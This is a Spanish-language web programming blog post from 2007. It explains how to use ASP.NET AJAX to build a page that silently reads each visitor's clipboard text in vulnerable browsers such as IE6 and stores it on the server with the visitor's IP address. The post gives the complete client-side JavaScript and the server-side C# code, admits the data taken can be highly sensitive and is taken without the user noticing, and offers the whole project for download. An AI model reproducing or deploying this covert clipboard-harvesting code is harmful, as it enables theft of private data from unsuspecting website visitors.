Saltar al contenido

Artículos, tutoriales, trucos, curiosidades, reflexiones y links sobre programación web ASP.NET Core, MVC, Blazor, SignalR, Entity Framework, C#, Azure, Javascript... y lo que venga ;)

17 años online

el blog de José M. Aguilar

Inicio El autor Contactar

Artículos, tutoriales, trucos, curiosidades, reflexiones y links sobre programación web
ASP.NET Core, MVC, Blazor, SignalR, Entity Framework, C#, Azure, Javascript...

¡Microsoft MVP!
domingo, 24 de junio de 2007
Hace unos días, visitando Caso Patológico, encontré un código javascript mediante el cual podía obtenerse de forma muy sencilla el contenido del portapapeles del visitante de una página, siempre que éste utilizara un navegador inseguro.

De hecho, si visitáis la página con IE6, podréis observar a la derecha un aviso en el que se advierte de la inseguridad a la que estáis expuestos al utilizarlo, mostrando además parte del contenido de vuestro portapapeles, es decir, lo último que habéis copiado (control+c), por ejemplo desde un editor de textos.

Si combinamos esta idea con la capacidad de ASP.NET AJAX, framework del que ya llevo publicados varios post, para invocar desde cliente funcionalidades en servidor, resulta un proyecto tan simple como interesante: crear una base de datos en servidor con el contenido del portapapeles de los visitantes de una página. Desde el punto de vista tecnológico, vamos a ver cómo podemos utilizar Ajax para comunicar un script cliente con un método de servidor escrito en C#; desde el punto de vista ético, lo que vamos a hacer pertenece un poco al lado oscuro de la fuerza: vamos a enviar al servidor (y éste lo va a almacenar) información importante, que puede llegar a ser muy sensible, sin que el usuario se percate de lo que está ocurriendo.

Para ello crearemos una página ASP.NET en la que introduciremos un código script que, una vez haya sido cargada, obtenga el contenido textual del portapapeles y lo envíe, utilizando un PageMethod, al servidor, quien finalmente introducirá este contenido y la dirección IP del visitante en una base de datos local. Como almacén vamos a usar SQL Express, pero podríamos portarlo fácilmemente a cualquier otro sistema.

Empezaremos desde el principio, como siempre. En primer lugar, recordar que es necesario haberse instalado las extensiones ASP.NET AJAX, descargables gratuitamente en esta dirección. Una vez realiza esta operación, podremos crear en Visual Studio 2005 un sitio web Ajax-Enabled, utilizando una de las plantillas que se habrán instalado en el entorno.

Después de esta operación, el entorno habrá creado por nosotros un sitio web con todas las referencias y retoques necesarios para poder utilizar AJAX. En particular, tendremos un Default.aspx cuyo único contenido es un control de servidor ScriptManager, del que ya hemos hablado en otras ocasiones.

Pues bien, acudiendo al código de la página (.aspx), introducimos ahora el siguiente script:


<script type="text/javascript">
$addHandler(window, "onload", salvaClipboard);
function salvaClipboard()
{
if (window.clipboardData)
{
var msg=window.clipboardData.getData('Text');
if (typeof(msg) != "undefined" &&
(msg != "") && (msg != null))
{
PageMethods.SaveClipboard(msg);
}
}
}
</script>

 

Nótese, en primer lugar, la forma en la que añadimos un handler al evento OnLoad de la ventana. El alias $addHandler, proporcionado por el framework Ajax en cliente, nos facilita la vinculación de funciones a eventos producidos sobre los elementos a los que tenemos acceso desde Javascript.

En segundo lugar, fijaos la forma tan sencilla de obtener el contenido del portapapeles de windows: window.clipboardData.getData('Text');. Los ifs previos y posteriores son simples comprobaciones para que el script no provoque errores en navegadores no compatibles con estas capacidades.

Por último, una vez tenemos en la variable msg el texto, lo enviamos vía un PageMethod al servidor, que lo recibirá en el método estático correspondiente, definido en el code-behind de la misma página (default.aspx.cs). Como hemos comentado en otras ocasiones, es el ScriptManager el que ha obrado el milagro de crear la clase PageMethods e introducir en ella tantos métodos como hayan sido definidos en el servidor y así facilitar su llamada de forma directa desde el cliente.

Vayamos ahora al lado servidor. En el code-behind sólo hemos tenido que incluir el siguiente código en el interior de la clase:


[WebMethod()]
public static void SaveClipboard(string texto)
{
string client =
HttpContext.Current.Request.UserHostAddress;
SqlConnection conn =
new SqlConnection(Settings.Default.ConnStr);
SqlCommand cmd = conn.CreateCommand();
cmd.CommandText = "Insert into Portapapeles "+
"(Ip, Clipboard) Values (@ip, @texto)";
cmd.Parameters.AddWithValue("ip", client);
cmd.Parameters.AddWithValue("texto", texto);
try
{
conn.Open();
cmd.ExecuteNonQuery();
conn.Close();
}
catch (Exception ex)
{
// Nada que hacer!
}
}

 

Simple, ¿eh? La llamada a PageMethod.SaveClipboard en el cliente invoca al método estático del mismo nombre existente en la página del servidor, siempre que éste haya sido adornado con el atributo System.Web.Services.WebMethod. El parámetro "texto", con el contenido del portapapeles del cliente, se recibe como string de forma directa y transparente, sin necesidad de hacer ninguna conversión ni operación extraña.

Una vez obtenida también la IP del visitante usando el HttpContext (hay que recordar que el método es estático y por tanto no tiene acceso a las propiedades de la propia página donde está definido), se establece la conexión con la base de datos y se almacena la información.

Y eso es todo, amigos. Como habéis podido comprobar, es realmente sencillo utilizar Ajax para enviar desde el cliente información al servidor utilizando scripting y el framework AJAX proporcionado por Microsoft. Si esto lo unimos a la capacidad de extraer información local del equipo del visitante en determinados navegadores, los resultados pueden ser espectaculares y realmente peligrosos. Afortunadamente, las nuevas generaciones de browsers (IE7 incluido) se toman la seguridad algo más en serio y hacen más difícil la explotación de este tipo de funciones.

Finalmente, como siempre, indicar que he dejado en Snapdrive el proyecto completo, base de datos incluida, para que podáis probarlo (AjaxClipboardSpy.zip). Ojo, para que todo funcione debéis cambiar la ruta del archivo .MDF de SQL Express sobre el archivo Settings.settings de la aplicación.

Aún no hay comentarios, ¡sé el primero!